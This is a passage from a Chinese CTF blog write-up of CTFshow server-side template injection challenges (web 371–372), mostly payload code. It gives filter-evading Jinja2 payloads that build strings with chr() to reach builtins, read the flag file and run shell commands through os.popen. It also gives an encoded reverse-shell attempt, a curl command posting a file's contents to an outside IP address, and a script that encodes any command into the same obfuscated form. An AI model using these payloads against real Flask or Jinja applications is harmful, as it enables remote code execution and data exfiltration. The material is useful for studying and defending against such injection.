<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% set a&#x3D;dict(a&#x3D;a)|join|length %&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250730162351-20260228215312-8pt0cg1.png" alt="image"></p>
<p>用 chr 又搞了一次，麻烦（</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% set a&#x3D;dict(a&#x3D;a)|join|length %&#125;
&#123;% set b&#x3D;dict(aa&#x3D;a)|join|length %&#125;
&#123;% set c&#x3D;dict(aaa&#x3D;a)|join|length %&#125;
&#123;% set d&#x3D;dict(aaaa&#x3D;a)|join|length %&#125;
&#123;% set e&#x3D;dict(aaaaa&#x3D;a)|join|length %&#125;
&#123;% set f&#x3D;dict(aaaaaa&#x3D;a)|join|length %&#125;
&#123;% set g&#x3D;dict(aaaaaaa&#x3D;a)|join|length %&#125;
&#123;% set h&#x3D;dict(aaaaaaaa&#x3D;a)|join|length %&#125;
&#123;% set i&#x3D;dict(aaaaaaaaa&#x3D;a)|join|length %&#125;
&#123;% set j&#x3D;dict(aaaaaaaaaa&#x3D;a)|join|length %&#125;
&#123;% set po&#x3D;dict(po&#x3D;a,p&#x3D;a)|join %&#125;
&#123;% set a&#x3D;(()|select|string|list)|attr(po)(d*f) %&#125;
&#123;% set ini&#x3D;(a,a,dict(in&#x3D;a,it&#x3D;a)|join,a,a)|join %&#125;
&#123;% set glo&#x3D;(a,a,dict(glo&#x3D;a,bals&#x3D;a)|join,a,a)|join %&#125;
&#123;% set geti&#x3D;(a,a,dict(get&#x3D;a,item&#x3D;a)|join,a,a)|join %&#125;
&#123;% set built&#x3D;(a,a,dict(builtins&#x3D;a)|join,a,a)|join %&#125;
&#123;% set x&#x3D;(q|attr(ini)|attr(glo)|attr(geti))(built) %&#125;
&#123;% set chr&#x3D;x|attr(chr) %&#125;
&#123;% set flag&#x3D;(lipsum|attr(glo)).get(built).open(chr(d*j%2bg)%2Bchr(j*j%2bb)%2Bchr(j*j%2bh)%2Bchr(i*j%2bg)%2Bchr(j*j%2bc)).read() %&#125;
&#123;% print flag %&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250730164730-20260228215312-moc9bds.png" alt="image"></p>
<p>‍</p>
<h3 id="web-371"><a href="#web-371" class="headerlink" title="web 371"></a>web 371</h3><p>把 <code>print</code> 给禁用了，那就反弹 shell 吧（</p>
<p>不知道是什么问题，但是他这里反弹不了shell，最后是使用 curl 外带数据，直接外带他的数据不完整，所以先写文件再外带，这里测试的时候不知道为什么他这个网站的 curl 老是报错，比如里面不能有 <code>&quot;&quot;</code> ，导致一些我的语句用不了</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">ls &#x2F; &gt; &#x2F;tmp&#x2F;1.txt

curl -X POST --data-binary @&#x2F;tmp&#x2F;1.txt http:&#x2F;&#x2F;101.35.151.42:8888&#x2F;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/network-asset-20250730175658-20260228215312-wsgm1sv.png" alt="image"></p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">&#123;% set a&#x3D;dict(a&#x3D;a)|join|length %&#125;
&#123;% set b&#x3D;dict(aa&#x3D;a)|join|length %&#125;
&#123;% set c&#x3D;dict(aaa&#x3D;a)|join|length %&#125;
&#123;% set d&#x3D;dict(aaaa&#x3D;a)|join|length %&#125;
&#123;% set e&#x3D;dict(aaaaa&#x3D;a)|join|length %&#125;
&#123;% set f&#x3D;dict(aaaaaa&#x3D;a)|join|length %&#125;
&#123;% set g&#x3D;dict(aaaaaaa&#x3D;a)|join|length %&#125;
&#123;% set h&#x3D;dict(aaaaaaaa&#x3D;a)|join|length %&#125;
&#123;% set i&#x3D;dict(aaaaaaaaa&#x3D;a)|join|length %&#125;
&#123;% set j&#x3D;dict(aaaaaaaaaa&#x3D;a)|join|length %&#125;
&#123;% set k&#x3D;dict(aaaaaaaaaaa&#x3D;a)|join|length %&#125;
&#123;% set po&#x3D;dict(po&#x3D;a,p&#x3D;a)|join %&#125;
&#123;% set a&#x3D;(()|select|string|list)|attr(po)(d*f) %&#125;
&#123;% set ini&#x3D;(a,a,dict(in&#x3D;a,it&#x3D;a)|join,a,a)|join %&#125;
&#123;% set glo&#x3D;(a,a,dict(glo&#x3D;a,bals&#x3D;a)|join,a,a)|join %&#125;
&#123;% set geti&#x3D;(a,a,dict(get&#x3D;a,item&#x3D;a)|join,a,a)|join %&#125;
&#123;% set built&#x3D;(a,a,dict(builtins&#x3D;a)|join,a,a)|join %&#125;
&#123;% set x&#x3D;(q|attr(ini)|attr(glo)|attr(geti))(built) %&#125;
&#123;% set chr&#x3D;x.chr %&#125;
&#123;% set o&#x3D;dict(o&#x3D;a,s&#x3D;a)|join %&#125;
&#123;% set cmd&#x3D;chr(k*i%2Bi)%2Bchr(k*j%2Be)%2Bchr(d*h)%2Bchr(k*d%2Bc)%2Bchr(d*h)%2Bchr(k*e%2Bg)%2Bchr(d*h)%2Bchr(k*d%2Bc)%2Bchr(k*j%2Bf)%2Bchr(k*i%2Bj)%2Bchr(k*j%2Bb)%2Bchr(k*d%2Bc)%2Bchr(g*g)%2Bchr(k*d%2Bb)%2Bchr(k*j%2Bf)%2Bchr(k*j%2Bj)%2Bchr(k*j%2Bf) %&#125;
&#123;% set code&#x3D;(lipsum|attr(glo)).get(o).popen(cmd) %&#125;
&#123;% set shell&#x3D;chr(i*k)%2Bchr(k*j%2Bg)%2Bchr(k*j%2Bd)%2Bchr(k*i%2Bi)%2Bchr(d*h)%2Bchr(e*i)%2Bchr(h*k)%2Bchr(d*h)%2Bchr(h*j)%2Bchr(k*g%2Bb)%2Bchr(k*g%2Bf)%2Bchr(k*g%2Bg)%2Bchr(d*h)%2Bchr(e*i)%2Bchr(e*i)%2Bchr(j*j)%2Bchr(k*h%2Bi)%2Bchr(k*j%2Bf)%2Bchr(k*h%2Bi)%2Bchr(e*i)%2Bchr(k*h%2Bj)%2Bchr(k*i%2Bf)%2Bchr(j*k)%2Bchr(k*h%2Bi)%2Bchr(k*j%2Bd)%2Bchr(k*k)%2Bchr(d*h)%2Bchr(h*h)%2Bchr(k*d%2Bc)%2Bchr(k*j%2Bf)%2Bchr(k*i%2Bj)%2Bchr(k*j%2Bb)%2Bchr(k*d%2Bc)%2Bchr(g*g)%2Bchr(k*d%2Bb)%2Bchr(k*j%2Bf)%2Bchr(k*j%2Bj)%2Bchr(k*j%2Bf)%2Bchr(d*h)%2Bchr(k*i%2Be)%2Bchr(k*j%2Bf)%2Bchr(k*j%2Bf)%2Bchr(k*j%2Bb)%2Bchr(k*e%2Bc)%2Bchr(k*d%2Bc)%2Bchr(k*d%2Bc)%2Bchr(g*g)%2Bchr(f*h)%2Bchr(g*g)%2Bchr(k*d%2Bb)%2Bchr(k*d%2Bg)%2Bchr(k*d%2Bi)%2Bchr(k*d%2Bb)%2Bchr(g*g)%2Bchr(k*d%2Bi)%2Bchr(g*g)%2Bchr(k*d%2Bb)%2Bchr(k*d%2Bh)%2Bchr(e*j)%2Bchr(k*e%2Bc)%2Bchr(g*h)%2Bchr(g*h)%2Bchr(g*h)%2Bchr(g*h)%2Bchr(k*d%2Bc) %&#125;
&#123;% set code&#x3D;(lipsum|attr(glo)).get(o).popen(shell) %&#125;</code></pre>

<p>这里使用命令测试太麻烦了，于是问 ai 写了一个脚本</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">code &#x3D; &#39;curl -X POST --data-binary @&#x2F;tmp&#x2F;1.txt http:&#x2F;&#x2F;101.35.151.42:8888&#x2F;&#39;

mapping &#x3D; &#123;&#39;a&#39;:1,&#39;b&#39;:2,&#39;c&#39;:3,&#39;d&#39;:4,&#39;e&#39;:5,&#39;f&#39;:6,&#39;g&#39;:7,&#39;h&#39;:8,&#39;i&#39;:9,&#39;j&#39;:10,&#39;k&#39;:11&#125;
rev &#x3D; &#123;v:k for k,v in mapping.items()&#125;

def sym(x: int) -&gt; str:
    return rev[x]

def build_expr(n: int) -&gt; str:
    # 1) 能纯乘法就用纯乘法：p*q，p,q ∈ [2..11]
    for p in range(2, 12):
        for q in range(2, 12):
            if p * q &#x3D;&#x3D; n:
                return f&quot;&#123;sym(p)&#125;*&#123;sym(q)&#125;&quot;
    # 2) 通用：n &#x3D; 11*q + r
    q, r &#x3D; divmod(n, 11)   # q ∈ [2..11], r ∈ [0..10] 对于 n∈[32,125]
    left &#x3D; f&quot;k*&#123;sym(q)&#125;&quot; if q &gt; 1 else &quot;k&quot;
    return left if r &#x3D;&#x3D; 0 else f&quot;&#123;left&#125;+&#123;sym(r)&#125;&quot;

out &#x3D; []
for ch in code:
    n &#x3D; ord(ch)
    expr &#x3D; build_expr(n)
    out.append(f&quot;chr(&#123;expr&#125;)+&quot;)


out &#x3D; &quot;&quot;.join(out)
out &#x3D; out.replace(&quot;+&quot;,&quot;%2B&quot;)
print(out)</code></pre>

<p>最后替换一下就能得到 flag</p>
<p>‍</p>
<h3 id="web-372"><a href="#web-372" class="headerlink" title="web 372"></a>web 372</h3><p>最后和上面一样的，payload 一样用</p>
<p>把 app.py 拿了出来，看了一下好像是过滤了 <code>count</code> 没什么影响</p>
<pre class="line-numbers language-python" data-language="python" data-start="1"><code class="language-python">from flask import Flask
from flask import request
from flask import render_template_string
from flask import session
import re

app &#x3D; Flask(__name__)
@app.route(&#39;&#x2F;&#39;)
def app_index():
        name &#x3D; request.args.get(&#39;name&#39;)
        if name:
                if re.search(r&quot;\&#39;|\&quot;|args|\[|\_|os|\&#123;\&#123;|request|[0-9]|print|count&quot;,name,re.I):
                        return &#39;:(&#39;
        template &#x3D; &#39;&#39;&#39;
&#123;%% block body %%&#125;
        &lt;div class&#x3D;&quot;center-content error&quot;&gt;
                &lt;h1&gt;Hello&lt;&#x2F;h1&gt;
                &lt;h3&gt;%s&lt;&#x2F;h3&gt;
        &lt;&#x2F;div&gt; 
&#123;%% endblock %%&#125;
&#39;&#39;&#39; % (request.args.get(&#39;name&#39;))
        return render_template_string(template)

if __name__&#x3D;&#x3D;&quot;__main__&quot;:
        app.run(host&#x3D;&#39;0.0.0.0&#39;,port&#x3D;80)</code></pre>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Marin</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://wwwmarin.xyz/2025/07/26/ctfshow-ssti/">https://wwwmarin.xyz/2025/07/26/ctfshow-ssti/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Marin</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web/">
                                    <span class="chip bg-color">web</span>
                                </a>
                            
                                <a href="/tags/%E5%88%B7%E9%A2%98/">
                                    <span class="chip bg-color">刷题</span>
                                </a>
                            
                                <a href="/tags/ssti/">
                                    <span class="chip bg-color">ssti</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2025/07/30/ctfshow-xss/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/0CAF98339D62431A38257026CDE441C1.jpg" class="responsive-img" alt="CTFSHOW-XSS">
                        
                        <span class="card-title">CTFSHOW-XSS</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2025-07-30
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/CTFSHOW/" class="post-category">
                                    CTFSHOW
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                    <a href="/tags/%E5%88%B7%E9%A2%98/">
                        <span class="chip bg-color">刷题</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2025/05/20/ctfshow-php-te-xing/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/biasduuaasdbsa.jpg" class="responsive-img" alt="CTFSHOW-php特性">
                        
                        <span class="card-title">CTFSHOW-php特性</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2025-05-20
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/CTFSHOW/" class="post-category">
                                    CTFSHOW
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                    <a href="/tags/%E5%88%B7%E9%A2%98/">
                        <span class="chip bg-color">刷题</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>


  <!-- 是否加载使用自带的 prismjs. -->
  <script type="text/javascript" src="/libs/prism/prism.min.js"></script>


<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4, h5, h6'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2026</span>
            
            <a href="/about" target="_blank">Marin</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">














</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
    
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
